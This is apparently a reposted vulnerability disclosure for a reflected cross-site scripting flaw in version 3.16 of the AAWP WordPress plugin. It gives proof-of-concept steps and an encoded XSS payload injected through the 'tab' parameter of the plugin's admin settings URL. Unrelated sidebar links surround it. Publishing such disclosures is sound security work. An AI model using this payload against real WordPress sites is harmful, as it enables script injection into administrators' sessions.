当前位置:网站首页>WordPress aawp 3.16 cross site scripting
WordPress aawp 3.16 cross site scripting
2022-06-23 06:07:00 【Khan security team】
supply Business Homepage :https://getaawp.com/
Software link :https://getaawp.com/
edition :3.16
Tested on :Windows 10 - Chrome、WordPress 5.8.2
Proof of concept :
1- Install and activate AAWP 3.16 plug-in unit .
2- go to https://localhost.com/wp-admin/admin.php?page=aawp-settings&tab=XXXX
3- add to payload To Tab,XSS Payload:%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y
4- XSS Has been triggered .
Go to this URL “http://localhost/wp-admin/admin.php?page=aawp-settings&tab=%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22 %40x.y" XSS Will trigger .
边栏推荐
- Implementation of linear list linked list structure
- Summary of ant usage (I): using ant to automatically package apk
- How to specify the output path of pig register Project Log
- Ant Usage Summary (III): batch packaging apk
- Memory analysis and memory leak detection
- The construction of digital factory can be divided into three aspects
- True MySQL interview question (24) -- row column exchange
- Real MySQL interview questions (25) -- common group comparison scenarios
- About the error of installing PIP3 install chatterbot
- Kotlin Android simple activity jump, simple combination of handler and thread
猜你喜欢
基于T5L1的小型PLC设计方案
True MySQL interview question (21) - Finance - overdue loan
云原生数据库是未来
【开源项目】excel导出lua配置表工具
[open source project] excel export Lua configuration table tool
Kotlin android简单Activity跳转、handler和thread简单配合使用
Redis 哨兵
HierarchyViewer工具找不到 HierarchyViewer位置
Efficient office of fintech (I): automatic generation of trust plan specification
Adnroid activity screenshot save display to album view display picture animation disappear
随机推荐
PAT 乙等 1012 C语言
Explicability of counter attack based on optimal transmission theory
Vite learning (I) - Introduction
[cocos2d-x] erasable layer:erasablelayer
Matplotlib savefig multiple picture overlay
Explanation of penetration test process and methodology (Introduction to web security 04)
gplearn出现 assignment destination is read-only
Excel sheet column title for leetcode Title Resolution
About the error of installing PIP3 install chatterbot
Vant web app calendar component performance optimization calendar add min date the minimum date page loads slowly
使用aggregation API扩展你的kubernetes API
jvm-03.jvm内存模型
Operating mongodb in node
Layer 2技术方案进展情况
PAT 乙等 1019 C语言
Pyqt5 设置窗口左上角图标
工作积累-判断GPS是否打开
True MySQL interview question (24) -- row column exchange
给定二叉树的某个节点,返回该节点的后继节点
Centos7 deploy radius service -freeradius-3.0.13-15 EL7 integrating MySQL